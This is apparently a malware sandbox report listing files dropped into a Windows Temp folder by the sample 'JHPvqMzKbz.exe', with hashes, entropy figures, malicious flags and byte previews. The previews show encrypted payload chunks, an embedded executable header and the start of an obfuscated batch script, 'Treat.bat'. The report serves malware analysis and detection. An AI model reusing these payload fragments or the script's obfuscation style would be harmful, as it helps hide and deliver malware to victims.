Preview:	.....S.q..P..._..t.....&Y........n.....9...Xr.7zW...a.....^OG.2....x3...c{..H_oO.......Jn>.{..N.B=a/S..dY.d8.3.....2z.5....Y3..."v.h.....e.g...@.q..'..G..>._..8....;T.(`..V.h...T......{kPd`8i."..=I%.8X...G.:..$v...\q.n..]jAN..3:L..l..GM.c4U.....i'..v..:..\.(.......A....B..E....+....p.R...;.<.&.2.#Uw..U...m...T...&u.\..J...g`...9(....D.c2Q.~D...@..../..C...I.y3...h.6T.Kg.^././..Q.I<s...6....f.....9.e-...y.,.SU#.t...'.Z.0..n......F.0..`...x.C...Kf.....\|<...Dc..?I.[...... \|...t..-uA.G{O.."..{..>sD........e..mw.....$s..%...6;m\|..Y.\|1....EVuK.Y<;.............q..!....NrZ%.^....7.gb..^.M5~.Ib............!$.XEM:[GFwY..C4.4)Qe..dp...f,..@B.....B~..J.o3..T.K..'}.j.\|...Z..x_.o..s...qD.........4.j....b.........\.46.X.&.. h._....S.(..u..{..I,.~..<.b........R.M8D.<.OHYX.X..T.p.e`.I......Ej.$p...Pg.9......4%.......z.:.S2.?...0.G...b....e..d.H..;./..v.........@. .<.....N........+.!../A..s.......0.s..\.~....&..X.@...u*...L...rX..m..k.$.).4.L..o>.X.u..Y.

C:\Users\user\AppData\Local\Temp\Denmark

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	7.996866939679604
Encrypted:	true
SSDEEP:	1536:wr1jbt8y9jKdlSD52LfwEO1G88/PjKP/cLPhDO4:K1jr6wBEcG88XeHMPhr
MD5:	006481206CBD4C83FA649632F7222EF1
SHA1:	6E2A05CDDAC05CE304A77460C6BD7B3F890393F5
SHA-256:	42390451E4799E041CF688FE02A9C33B6AA1B1D873F5B8C954B0ED8BA0AF63A3
SHA-512:	EE44850BC2B0390394080198BE27E8B74B6EE46E6E379BB3F3F9A4BA53830ECFE955EFAB4B2BEEC341ED302A110824350071C716DEE80B984D465A7D4419D69A
Malicious:	true
Preview:	C.D..z.......Q...e.:..i..L.).....g..@N......}....$O..)R....X.......h.DX_...^.r.8....ZRE........&....h....B.zaZM.VZ.t.za...^<~6..1&..7.yn..2?..:.}.~ .e...Re.w..E.n.X.f.)...(9t~...U.......z. f......}..D...\|..m..........c.. 8.i.%1...&M........ .\|....=Vk'F.......6.L/...."6...mH..CT...bNo.qLa.n.Bn......N...n.j..zBN-.T...._.lt..V....a..++s.1..s.. ...n....O....'..b.I.r../4b.6.R?U.9.....vw-.....;U..(...FI..pW]A.....s./l....o7RU+[..].yx.6....E....K...v.......d.....o)Y.\|L..(V.....y..^.1......./.!2../.....R...)...^...?^.m.gQ...+\.c.@I.......l.e/.........m...5....J...i.P.%9..m.7....K......p<]R..C.;.o.&-8.GQiH.l..V....R.._.....jj.a...g....w.`Z....~...O..N.w9".}.US..._..\|..-....2....oF}).O."ri.sX.x/.#..}......,...yf.5ZK.]..(l1...I._w...2P@?.U...8\.4$.U..2./e...L..X.F ...C.9..U....^..Q....[..M.d...X-1..3.....;......W\|.)E.._(.-....F.=.%.g$H..'..O...YQ.Lw..#J..o(..'4 ...l..Vz..NU...;a..>.\|....qa.n4.}A..'...E..n.gw.4.8.!.kR.M..k...L86. .Ta.L...H..

C:\Users\user\AppData\Local\Temp\Firmware

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998262717818217
Encrypted:	true
SSDEEP:	1536:FnIQFc743/BznJF62RsC1fqzKu/JeFXfbLQxj1wvW4uAiQP:FnIQFxle2yC1fqzX/8Zbsnw+pAb
MD5:	4AC36F51637D82D4D2354108DE385A58
SHA1:	0C556B79CC52B6710DADCFDE1044C1481D996F33
SHA-256:	0EFEC48BED8C476258CFC1A5A9694D42837234134D0947A2F9C041752F7485E0
SHA-512:	EF661C0C5457002D521C8790E37BD286344A77DEA70A9EA0F7BF74A22E6F3722AD67F0546047C29166CD273C6F9415BA0DC7F68D2282AE2E4C7EBD38402AFD9A
Malicious:	true
Preview:	.m"'h5..j/.U..b.j.Q.r....@.9.r;...jn6@.3..=..M.-..f....o.d.C.J.)...NT....f..zB..&..=.....$\|....u._....v.w..^..T.......z..&../...@h.U.w.:...@......0p.:..Ob. ....~...5..]v..g.B.. ......Ak.Z.O#.......6.5.=....w.{...7....4..c...0T.\|..P..B<y.s.#..R..jvrr.i'...4..q_>=.{. ..=.0..Y.f... ..K.....B..4q.Y.s...gl.XM4.T.D........e.@!......J.L..q..[.k.Z.a..V..-...Ps.;?p.R0U..\..)}.R{'1..3H)".;...OM5.s.?....sO.p.`.{Ek'..._....~...b E...A...j..\._..F......-...!0...5H#"....H..@...hjL.=....V&.....leJ.'..<9>dms.1.\|.{.O..v...j.?.....jI,.(..xPZ..0..>...h.;.o.~.9....I.%..ox/C\|e.{-!...E....-^0yQ..=.....t\D.T...K...!!...`..0......,...6E.B.A v2pXy....O....J..............Q\|.,R.0....[....1...g.........@..$....w..a.\|}.....<A..$....o{_...E.P2~4 \|67.G....n(...A.?..J.....;.rK.k..69.h.....&`4....b.......Q.#=.\T....K1..@...`..Q.....kn......cK[..6!y...t.).B.M....et.50....qJ......U.N.=.u.&p-.s.c.?<...5..,.[.....}x.q\.2a6.D+.^..-m......P...pQ.vwe.4.....Q.U.h....

C:\Users\user\AppData\Local\Temp\Gay

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.998406840995759
Encrypted:	true
SSDEEP:	1536:XJ4XeE4GWGOA1ID4V3ONNw9G6m7/JRLJCdcX1C7T/MzOOg1EtjXkVoNiP1tvet2:XJvMuCNY/JRLJ3XM7TUO6tIVDLew
MD5:	997016FD2FA51B13FDFF955E76B66D21
SHA1:	1190F5454BB69687440FBE9699B26BF1A7DC65DE
SHA-256:	06978FA33A74EF4C3B3D4971BBB2B8EFFF84DAD1FE2F822DD8C3E179DD3BD880
SHA-512:	D9CA616E7CDBC7F7376CA75A9EA1E75DD140FECACDF5744F3DD36DDB2C332D37649016E495179E0832F8545FB2579150C6664C7678CB08841F7ADD1148BE2865
Malicious:	true
Preview:	.y.....h{P+.]....0Tg=...S..cCw#..0].$Bx.D..xW...&u2.&O..L.0A.B[.s..(w)...]..D....u..i:..#?...2.f.en.....n..7............=.'(.n`..60!O.%..nw...5.4-y;@-..a1~..m.H".Z...{..........O...y.(.ujB..........K..H...j.9..3Z0..Q&.....:X.....>..,<...Y...v..L..s+.$u......U....f..<.Y:n.....R.~....=.z.a.1.`...p.x".0G"..S-aE}...7.c......./i...B..6....z...B.D.ja.:].^-.fCg0...k1..W.Y....okk...644.o.G%d.$=D/.C3>z.._.i.8...)="\....{Tel..$....ai......a.F.@.3.=.{Dg.f'x0d?.!...CJ...x.'..w#.2..........F....k...a.-...M.(..Q..2.a.,.w..:;-..G/.aO.....4....Jnn.y#...6].Jc..R.J.).F\|6C.3g.W..@3 .".8.4h.B.......1.z7.....Z+......Ah.."T.b.@...{..B.o....bg.x...6...&....._7\|P.8.;........b.%.@...8.....J...`..A.......".....Q=..e...."...,..-V.W...z.,....OB$pO'.^....i....N.......9....agnK9.J......g./...k#5.. .6E.RH.j1..Z..8..2C..+...V...........K.[-;..N1....:.....8....B......H.EW..>.KV..n>5YJ.j".Z...3.M..<.)av.M....X.....<5..<R.wJ..(..@...O+.~..;.YM2.Ui........G..E.W1...:

C:\Users\user\AppData\Local\Temp\Hop

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997281990809557
Encrypted:	true
SSDEEP:	1536:Q4x6udQMLyCGFQLsCTvNZMz/5U5pIDL9pQNmMVeZ0LxCQkMMI5Li/:Q7uPLbfwCTvNZMWIVpQIHqfCILi/
MD5:	246993F804971AFF1DA64D44386BEF26
SHA1:	8D04FB03B432670EE3B207FCBC616231EC862285
SHA-256:	0BC854AA1B688F84E401919B4C2308F31B88C24068CB64B18BC8F8531F7BCC2C
SHA-512:	2A181D37404FFF73F897164152A1076A47517BEAFA5FE4852544B2F826CC5E700EE5ED0A86EC89AC748A310E34E95A3C0EE8A0656BED283340E25D24346DD5F6
Malicious:	true
Preview:	.?..U.......T\|...R.......8\|..pc.{s5.?............b...?.\.H.....0B..R.%...j..h.....M{.v.y..9..Q.Ei.........Pd.c...DF3b?.j....c..G:....a...%.>.........O.....@3%.8~.3.HX?.X-Nv.b....c&.]..M......]?.D..@.F.t}..tp.U..._N.......C..=.e.ZG.......^..K.E.j.%.D;.\|d.S.^v.@Z .......B0..!....4....z..6.@....p.....k.._T..9QK.+....0u.......O....?..x...Y.=......M4.....W..5f...XO.....i...R@{......GI.tN..<Z..@E.v.g.8.T..r.>nFW....K.1.;..j...'..]~.....c.....:&...z..~..H..1...bm....R....MI2..C......M..'..o.]...u.bW...O......Eu\/.....rR..Z.....V...y...wd.j.ASP..UX&"..3zIxJ.x>-.....l.7....:..r);........#....l.r..l.d.Y]...D.........w.{..../(.8..ae.R.Q...=j.eo......>........k64....]...t........H.Y..:....m..1..R.....jnA..Zc..w.O...<..a%.!_.p[.Q5.U..)G/j.n#.8..q.z.%!....0'x.6.^.s..<...m.b.>\.LX..]%.Q...Lsjt_.../..2...(.xT..cD.N.W......}..a...OW....\P..!.[...z.{#...tV9..ST....g...d.L..#<N._.k...#4.?.w6:W#.....Y..*...wDm.g.V..b.L.j.^..A.6..3^.ja.".t9).\|...

C:\Users\user\AppData\Local\Temp\Invalid

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.998165433844562
Encrypted:	true
SSDEEP:	1536:JCKnLas3JHUUddzi+K4qBdX3wa1/ne27Mq15SE6wb2IzG9ebMM3krgeAkNZWnaC:82Ws9nK4MpwaFemP5SwCIS9irkrghsZ+
MD5:	804F99FC8FEF68F602B5BE45A6008A88
SHA1:	82C7298D0ABF37DEDB6CF5420EACE6020E4B9CA2
SHA-256:	8CB4E2B1E61169AB59989E55EBE8C8234DBC13C571B5C87EE90EA4C0DD3F04C1
SHA-512:	9573E28719D68A50E2171F3D9EDA5AF01236011B16EFAB4E90F0597612F9DBFE35BA7F137DA965A5016E19C2A31E8C68DE700588062EEA0DD206DAE0641197AD
Malicious:	true
Preview:	..MZ..._V....vQ...G...`.ez....<>.VHr.Xi.}.."Ue....W....la.&uaf.(......6.J2=.x,........?.0.4eY....i.nA3...yB+......B{J.S...Go.<..j~..P......DH..Gk{..?C..J............4!1..(...`...G..B;...%..7....(.q.]g9Iv... ...e...p..p.).X.............I.D^(7....\|.w)(...S....r.0Q.........j..X....e.~..mH.....+....../..$.U.....4...Y.i.;Vjg.g..u..$...7....F.$A....F........H...2x$A......5;.......a....&/..F,...mW.L,.t.X..jB..m!.W...y..bTC./I..\|......,.:.g..:..(.Hw....*k%L.s.I..(H.......mv....M......Va0Z>./..M.1..4U..f/...S.W..-.....bG......t...@.C..W..A.......{;yp.p...]..t...0.NQ..m.#.o.d_...x..ox=.e.k..cA{.V.H........./7.O .....A^..46..]..a.u&...]@..QB.../............^.{.....8..!x..].P3.C,L....0~.....{.\|...U'...}..Z.S^B.dx......4.&OdQs.9....H.G.M..B.....N..w.+sT....B~..P.rp.$...qR..e1.oWR[...~c ..{F.,..F..w..............X/u.6$n..rz.p..._.0('..q.s.....k.[z...u..j...oWn.8...].........oYY.d]+....-L.....:J.U..[.q.i..z.p....Y.!.@c..H...........(.e.n.Oi\|Xd..]

C:\Users\user\AppData\Local\Temp\January

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.996934814318815
Encrypted:	true
SSDEEP:	1536:/AKILKCpiCNjYZNyqLgTTNe2/00oqoOLgPANCd9Ks7r2Lvk9M+b8:4fbNcZNyqiE90odPLh7r2cK3
MD5:	06B437C07120C91C7F92CE0BC670AB1D
SHA1:	17F58C591C6F8BCFD92E88022DBB16D14C860C18
SHA-256:	CDA405B2F101FEBC4D73784EB66A0FB6241A068448F1F59DA50F94D6427D2491
SHA-512:	F49A3F0C9B4E6ACA1A3C07183CEE4A17AE0B6DEB1DD95BFD63B50C768A10243BD49A46FBAC3AFD626CCE4CFB50F9DCC9FA3EBE287955042AAB705E305F747095
Malicious:	true
Preview:	.....I..r!........q.y`e....B...!._p..9s<...h.m...g.......C..]...l.4\|.....d...U. C..J?\..@.c.U$.O~..p... 5..........U.'b...i_O(dh.0.#.t.tg\|...-....Dp..;D..S-..Q....O...~H<l.....".?...4.N)..yb.C.......8..0...T..^..5.=7.s....n.q.m..t....3F1..CR._..z(e.a...m...7%.....Q.;Y.hd..5.w4JbV../.VYjZ..2.3.TM....U.\|.^.r........Ts.....{.q._.,.yF&'...$.S\<.[.h?,...B..s.r..X....V...a..n.z....j...}......b..C........1.]..2.=...N..0..u...\[..vu...;..`...E...H....##@....V.H..(.(.A...,.JU#M...`.=..;.;'L.0..o.....>.r.@.@.Y...m.}.......M...b....b.[..e..yh..h.#....I.\..G...`.~...n...x...%...&T.6.}z.....5.{...*.b.....lH....c,.t.?yg;...........8...!.j...7..D....n.......d......x.........&r.V.d..k.P.'P`L.8.@.Q5....F..W......3+7./$..."..G..F....k....'..4Ou...1R...::K.L.3..@".nA#C.GR....@.ik9..`^..r.{.G.....h.....fD'.;s....<...^.....q(.5....g..#v'....K.....^..A.....{I%q...R.... ;.v\K....S....Bj.m......{\|.W...Pb.......h.+..k..XF^...N....X....=l`.+f...PB..VT..z<E

C:\Users\user\AppData\Local\Temp\Johnson

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.998146735025295
Encrypted:	true
SSDEEP:	1536:RFRFHseRZRQRHpbpwzxAHDgizTlD+x7ZGuC85SpTsKQig5IrjUQryc+loTTCRl:RFHwRMSgiND47ZtznN5IHZU6TCRl
MD5:	45FCE45AC7BA97912A521F861FFFDA46
SHA1:	F8B2190331947EA12E4B01A575CFFC336D0E1821
SHA-256:	23DBD2C3962063F75956F209933F5BBFC5F20364E4BACC198D32B832F624A49C
SHA-512:	099DC0F6A696C4186B046A23EF532AA893D437C59FDB820EAEE085516FEDF28F4123F0239708E8EBE36EE405E4FCA358B6175EDF5B09CDE69006C16180E56031
Malicious:	true
Preview:	.X.:..i7.(..J.7.\KN:$.},+...yM.......e.&.A...5.s.. ....{KB.R.(....2..33M..f?].r`.......r..A1.CTT.I.m...;>......@q.wU'......5NWZa.(Z......TB....kq.qLh.0!{(..g#..#...E...BW..F...tS..R....I.E.z......M;uB....z{.o2=...M..o......c.....P.l.h......]...&Sx.`n....,..>x&Z......G..v..i...".E....Cla.....\.J.M4.r...pD.........e...i.El.L..&....&az......j........D..f......%...YO1!..E.../.S .o....Y.&8..a.\|.7.\\|..NdI.'1.G..5B.N]:.CK...@.....e.E.P.?.eb.u:..-.i.....e.FM.XPK......+..].5?........!...}f Yd_.p.4.X.....!.g......_.>.;.b.W2.3~.}z..T....$....9;U.T)......U#..,.g ...3A-..0>Q.X.K.7.....[.... .G"..B......../S..bb.~....%..{5.@......@`).....L.xF....U..u.MG...5...y.j.y..M2.......~.50"....S.....f....{^9.%..2..G.:...>.n.....d..d...U..S.Y.!l..T...s.../......j...G..){6.#.1<..F....e..._......(_NQ.....f.....UH...p.6...CD..L..3..A..]..N..b.k2..EGU....&.........g.....^...O..GQ\|u..]...4..L.........K[.......Jp..H8..f.......03..]...~........77.c.L..D..m...8-.Q@.T..3..

C:\Users\user\AppData\Local\Temp\July

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	7.997931106935419
Encrypted:	true
SSDEEP:	1536:gzQ7Ngvy6Tmlll0NVSqKma7QTiLwVdLH5HQS7rWnJfvMSEswC0BWbDwmWpbO:CCsyRcgYqQTMwVdZ7r6kSEswFBW3wJbO
MD5:	04CAD2AB332F64C6161A3A4308DB8FD7
SHA1:	016A65C178852632B151EB917EBF7623BB9DFFC0
SHA-256:	9C4A70CF8295104B4B13FE9F7F99AF2690AE94760521055C0F492169C1377DF2
SHA-512:	BF597406DC401F26D91679EF3AA275F6FE1549A0AE5424ACB6879A7B003E53C3936A3E290CCF228CC1D2AAA67FA2A8B78CCCAE929AAF7397D33E363DF52DD243
Malicious:	true
Preview:	.....4.D..........T..Yh..2-S.R.XB(..h.....cF1.hd.....hj.`a..%.m$2kG.#i.x.9..l&.vE..K#..}U+.....L&b_.VU..../}...(-k.[..[x9'..cm..'._+!m..+s.M7............J.f..R)1....m=2.......o.r\.Y..@}...:..2j.\|."..8~ac...)..F.R..... .^8.zWKW.\b.2....4.;....8s..v......,....kU.nK..oX......?.'u......9..~...h.p..q_.....1H.y.......l....$Jw2Ps....\.:..A..6"W]H..Tk..v....P.....C.!..W.I.._N.0..]Su..\.-......e..q..D^.n/.D..M..r..:..O....<.[@..O.CuF...:_..1%.YQ....(.../;e.J..^.....I\|+..ld.2L....f.t..,.M?...s.0w[...F......@.'.\|.......j.)/..rb..Z..i.5!...`.4f.b...RM:.n.....9.b.t.D.[/...".i.......S...G.b~....3.Vr...g5...wr.....e.......YB~p>..RQ.....y...93.^v.........WY.1U......D.Yx.t..........4....UR-N$..4M.1...De.a....B...x.T./ZL..EK.7...0zd+.7.\|......`9.. k3..........4..1.d'.\....;o./"...6..E...-...l.%...L.....J.....kJ.C@...V...`.s~h..PP.../=X.J[.&..3m...h...b.".93',.j2...8.L...M7.@..]j...stl(~....@O}.q..q...h.....$?G.P..k...P.f...>.& "..b....sv.T'I_y.....E.=.p.7....

C:\Users\user\AppData\Local\Temp\Purse

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	6581
Entropy (8bit):	6.172884454985171
Encrypted:	false
SSDEEP:	192:HHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMX:HHAHhww+/2nlP3r1WU
MD5:	EF125E0BF013C42DE1651613D7BA0375
SHA1:	8B50CCABD5F95D730B5744A2D6460AFC5BF7E9C7
SHA-256:	25BA04AA9001223300DB69F53E972056137193689EB964862228707099E618BA
SHA-512:	23D9CB80F032F61F403D4CD6090E9A4E3849AD4A1002213A9838B1DCE4C12DA2F7E8EE5E6A9E366527F972EF572B8341845D64D876F95164132FA4E231F8F76C
Malicious:	false
Preview:	AffiliateRobotsJoinedNewsletter..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ruled

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	7.998031429526617
Encrypted:	true
SSDEEP:	1536:joGr0O/KK/H5vbWQ4UuHWXi3q1FF2ktRX9NPn7go7Bb0HdWKaInsu36TtJ3U:n0O/7H34hH9qN2cRXxJ0H960
MD5:	AA5C108559ABE590BC4EDF77E20E2F2D
SHA1:	88D41D1D1DBD210226B353339E89FCA3D1664FC1
SHA-256:	BB324D7599D0862F7E788F941204D85E7B47DC921E3D38A9A48ACF80FCD0D0D2
SHA-512:	091519A9EF4BF0A08E02ADF30D627C2220A2374B10880A4D7E0EEA3E4F39FE293214DA3AE9051AA9AD0C83C41419996F44D56B5E878F0BCB352D67A271AF39EA
Malicious:	true
Preview:	.....m....u.j...f..6 t$..y...k...g%%X..\.9.~...jv.\|1{.c......9+.D;.<\|ot.]J......N4.A..p7........7..8Z.,%v.I....w...r.SJ..:..Zn...i<.^...S~.1(K.._\+..'.`.....=..H..-q..;F......4.]-._.N.......2.k.....9.hu......A.?U.....j...U...d..}....i.....L..1...0.~...fW..e........u...bf.B>..$J...(.w-.H....+Zd..Z..O..&.G;..7.v..2x.....8.....f..w..?.<.kLZ...FG."T/.o\.&.&?f..B.'1.a.0w.........c..3.z"I>....v..e]....d..YW..E....V..&.e....=5.;]Z.h..R?....p..j.=..8..../..Z"'.%L...w...d.k.A.........9.M.c.0"..@.. ...m...C..?..#.-...C=.K..K.f...A....J',S.........g(v>q........+..6.Z7.^..aA.?p..<.....~t.A..;.<...k.6..x.5...j"...b..K.c.Q.J..~...v%<"]..^..l$....X.z.}..!......LN..7....A.U.%...a.L.'./=..j......~....<..}....bP?.4..<.v.vd....S.3:c}.2....A_..cD..F.A%4o..-."LS..\..H....M.6?{.>.l.b~..y....D.:yGV'..ye"it..)..,..s.BT7.iEl{y.d.9.T.L(.f..K...m...$..`.0.I8......fi.G....$.L...{.9.%..v......(.....Y...M.k\|.... f.t...G.).J. ...V...m.=.p>$)U.41.s..x.P.^,5.Z.x_I..+Xpc

C:\Users\user\AppData\Local\Temp\Suitable

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	7.996882733834849
Encrypted:	true
SSDEEP:	1536:2opE7AcK6fBJjgD2pgCHs/hOrZ9hmYjL9iHgWVRvxh6:21EcgD0/M/hgZ9x/9iHgiJo
MD5:	9A86A061AC6F60588A603DAB694901FB
SHA1:	542FA7ABE87867D17DE53C1B430F02B6BAA6C97A
SHA-256:	AEFC1A30B5A9CAE66FA5E1E51B0F73E7214C6B5A07D14819E9C50CADF925517E
SHA-512:	3892E394720D527962B09B6FB03B6C3639CF8E458808D36A1C910823801E54A548690260421CEF7D69E4B365FA4CD09778BC9958A20C898F70783EA53373FCA8
Malicious:	true
Preview:	..k:..z8...g..\|V.0g.J.H.m[...a.V...m.^...d...[.&....U.S..m......1.H8.]C.......c7[..G...x!..........oL,....#..:.....\|E.....j}F.L...pf.s.`.lD.q..\|<....WGXh.G..@&.....G..4...^.L.....3._g).p.,!.PF.4]..5z.........h..6B\....9Q)..gc.....t..O}L.@4T%.,...W4..v.)....?......._..h._...E.aI.s..O..e.ta..n&Q).%q.J.@...+.ZJ.....J..BR. .F.....;.p)0...9;..W...1=.+./Q..xn%...{F..Lq....8....p.>S{.;.(..x.T,...Db.Hre.B./..&;.w.....Y?].s-.O..wN.XZ'D.88~.VN..'Ku....#ac.8!.T..b.i...r....3...Jw(~..{..4..E..F)_..y..j..o...Z.......@.i%.,mt...m.E....,...D..7.m\|S...j.z.L.`.f]...........$.$....^......:.3..Fz)..n.V.+A).KU]'..]..Ww.B.q.`..M1..K.$.7..S}....R&..z"Ya.TX_..x_..Z..Z.B%2....:.Z...d..}...X.6...{siV.....H.Vg....<..$d...U..M..'.n?.=....n.'.l/:..c.lW..M...uK...`M........o.@..!o.0...s..,"...B...T.....:jb.qA5Hl.../d..2..U...x........B...b.....`../...s.`.~FY.....s...8....~x5^^....v.9.;S.T..T.w....?.._.....+0 M.N..F._;...Ia...]>..-...g.FAf#..{.).)....I.Q<p..@..D.*VU."...

C:\Users\user\AppData\Local\Temp\Treat

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	ASCII text, with very long lines (1592), with CRLF line terminators
Category:	dropped
Size (bytes):	28735
Entropy (8bit):	5.082295390762243
Encrypted:	false
SSDEEP:	384:iBjevk+Mu+CF/wwzJmxF7R7az8Fv2Ze819nwCV0hvHHmV+VM4mv95xh+hCRAU3/:iBjZLuPFyfazKypnnj0hvnmsi4mj+1o/
MD5:	84E3F6BFCD653ACDB026346C2E116ECC
SHA1:	43947C2DC41318970CCCEF6CDDE3DA618AF7895E
SHA-256:	00A0C805738394DFED356AAE5A33CE80D8F751C3B5D7E09293817C07FBAEB9FD
SHA-512:	EEBA8F5C0F9163BC38080AC7CFCC5BABF9DFDF36B34B341416CA969B9F19CEBB141F8B0D2E12E7C41D886EEC36E23CF1525A7CE28785AD09154BC3DB78CA0591
Malicious:	false
Preview:	Set Aluminium=R..lKlXCisco-Scan-Deficit-Generation-Trauma-..PNPerfect-Ranging-..hMZForm-..LunLAccompanied-Casinos-Finding-Camel-..XkAPoster-Br-Mac-Pixels-Screenshots-Riders-..rCqRu-Audio-Considered-Eyed-Debt-Lyric-..RMmArtwork-Industrial-Hip-Dealing-Delicious-Models-Xi-Dry-..ZirRContests-Exam-..Set Drive=9..pmHxScripts-Ix-..TypeExamination-Happened-Lounge-Equality-Exams-Coin-..cUkExcluded-Placing-Informational-Overcome-Tvcom-..YHhFloppy-Shipped-Considerations-Regulations-Inspector-Logs-..eXCartoons-Coach-Ships-Header-Golf-..nTxFlyer-Dt-Dramatic-Clay-Automated-..sRqBulgarian-Mattress-Scientific-Architect-Wait-..sDSBanners-Garden-Velocity-Powerseller-Finish-Chan-..ejEUDependent-..hrBwWearing-Computer-Identity-Analyses-Institutes-Helmet-Myself-..Set Notebooks=M..RhtTransformation-Fear-Nashville-Reform-Fallen-Offer-Magazine-..RcyTheory-Providers-Wilderness-..zdVAntivirus-Sensitive-Only-Opinions-Containers-Back-Piece-..hfseExpanding-..tQKazakhstan-Salmon-Conversation-Pets-Packet-Gods-Square

C:\Users\user\AppData\Local\Temp\Treat.bat

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1592), with CRLF line terminators
Category:	dropped
Size (bytes):	28735
Entropy (8bit):	5.082295390762243
Encrypted:	false
SSDEEP:	384:iBjevk+Mu+CF/wwzJmxF7R7az8Fv2Ze819nwCV0hvHHmV+VM4mv95xh+hCRAU3/:iBjZLuPFyfazKypnnj0hvnmsi4mj+1o/
MD5:	84E3F6BFCD653ACDB026346C2E116ECC
SHA1:	43947C2DC41318970CCCEF6CDDE3DA618AF7895E
SHA-256:	00A0C805738394DFED356AAE5A33CE80D8F751C3B5D7E09293817C07FBAEB9FD
SHA-512:	EEBA8F5C0F9163BC38080AC7CFCC5BABF9DFDF36B34B341416CA969B9F19CEBB141F8B0D2E12E7C41D886EEC36E23CF1525A7CE28785AD09154BC3DB78CA0591
Malicious:	false
Preview:	Set Aluminium=R..lKlXCisco-Scan-Deficit-Generation-Trauma-..PNPerfect-Ranging-..hMZForm-..LunLAccompanied-Casinos-Finding-Camel-..XkAPoster-Br-Mac-Pixels-Screenshots-Riders-..rCqRu-Audio-Considered-Eyed-Debt-Lyric-..RMmArtwork-Industrial-Hip-Dealing-Delicious-Models-Xi-Dry-..ZirRContests-Exam-..Set Drive=9..pmHxScripts-Ix-..TypeExamination-Happened-Lounge-Equality-Exams-Coin-..cUkExcluded-Placing-Informational-Overcome-Tvcom-..YHhFloppy-Shipped-Considerations-Regulations-Inspector-Logs-..eXCartoons-Coach-Ships-Header-Golf-..nTxFlyer-Dt-Dramatic-Clay-Automated-..sRqBulgarian-Mattress-Scientific-Architect-Wait-..sDSBanners-Garden-Velocity-Powerseller-Finish-Chan-..ejEUDependent-..hrBwWearing-Computer-Identity-Analyses-Institutes-Helmet-Myself-..Set Notebooks=M..RhtTransformation-Fear-Nashville-Reform-Fallen-Offer-Magazine-..RcyTheory-Providers-Wilderness-..zdVAntivirus-Sensitive-Only-Opinions-Containers-Back-Piece-..hfseExpanding-..tQKazakhstan-Salmon-Conversation-Pets-Packet-Gods-Square

C:\Users\user\AppData\Local\Temp\Wisdom

Download File

Process:	C:\Users\user\Desktop\JHPvqMzKbz.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	7.996924652343393
Encrypted:	true
SSDEEP:	1536:0LmBTTvF2WqoMTu5pgDAAKX3m1ay9ttyWhMM2Q:0Lj2wmp2+H69ttyyNN
MD5:	5EFEE5D7EDBE127050E3EA3D197120AB
SHA1:	5FA5546F2890EA0298314D46ED7F0BEC3819C3F6
SHA-256:	AE4ADAE2962A4DFCA41929164973D98217401CFA39264F3A367220E09DC87E8B
SHA-512:	3644B60EAEE9D35E9FE33DB8571D0FBE19C61CED979A68098BE93C3CDFAF2A82B3EF8329A015FC0644A48C19782A27864948C120744B2D01D6E0284803DCFC61
Malicious:	true
Preview:	Z.]8.t.nl.....T.....a..!=..."t._P.d........e.b.1..0.....3&....KB...Q.......b..@yh.......A...4SY,.r.U.#0..h'..q..g.}......c!q....Z......y%=(.N.._.Z....\|.^Y+....o.\.x7t.. 8.s.J% R..\|g..e7.h.7D.s-Zk.^0..i.....K........q{.v....._.'...q.~.../l5.S.d.X..4e.k.\|....?.....6k..........J%.H.x....Y...L.U.......U.QQ...+....s..S>v..5.x9....$.B.hW.F.i.C[..(.W......V...._.?./L.^;/..8#.q.G..&...&.Q.`'.qO.+\|........+~.q....n..3.S-.c...~68..<.DC..${..T..N..&.."K..BW.8....9...2.+Q.E......5O..Z.....T.?o..oQ..PO....\|..94._ ..`.^..y...,...4...\.../..6......-...3Ax.B?.......^X...W.c...+.C.Y.,..../....m..~8.....7RXG.B.D8....W.....{66>....5....(.N.75%s..E...F..~m.$RP.,.Ba..%\|.#CL.1.Qs.F.Y..n@.CP.....a(....]...... X./..N......O....:CWbK.T..9J.d.@...9..3..W...M.....g.......0@..K.R(.2.N.;@5+....-.........z.../}.X...z....(..;GWu...th1..+..9."..L.......YXc.W@..'.3.$K.U...(x..t@[.b.-{...rW.../..2.`.p.O?n......G...(3.1.dE.#..{.d.....@../.).t..!zxX....o...Bc

C:\Users\user\AppData\Local\Temp\delays.tmp

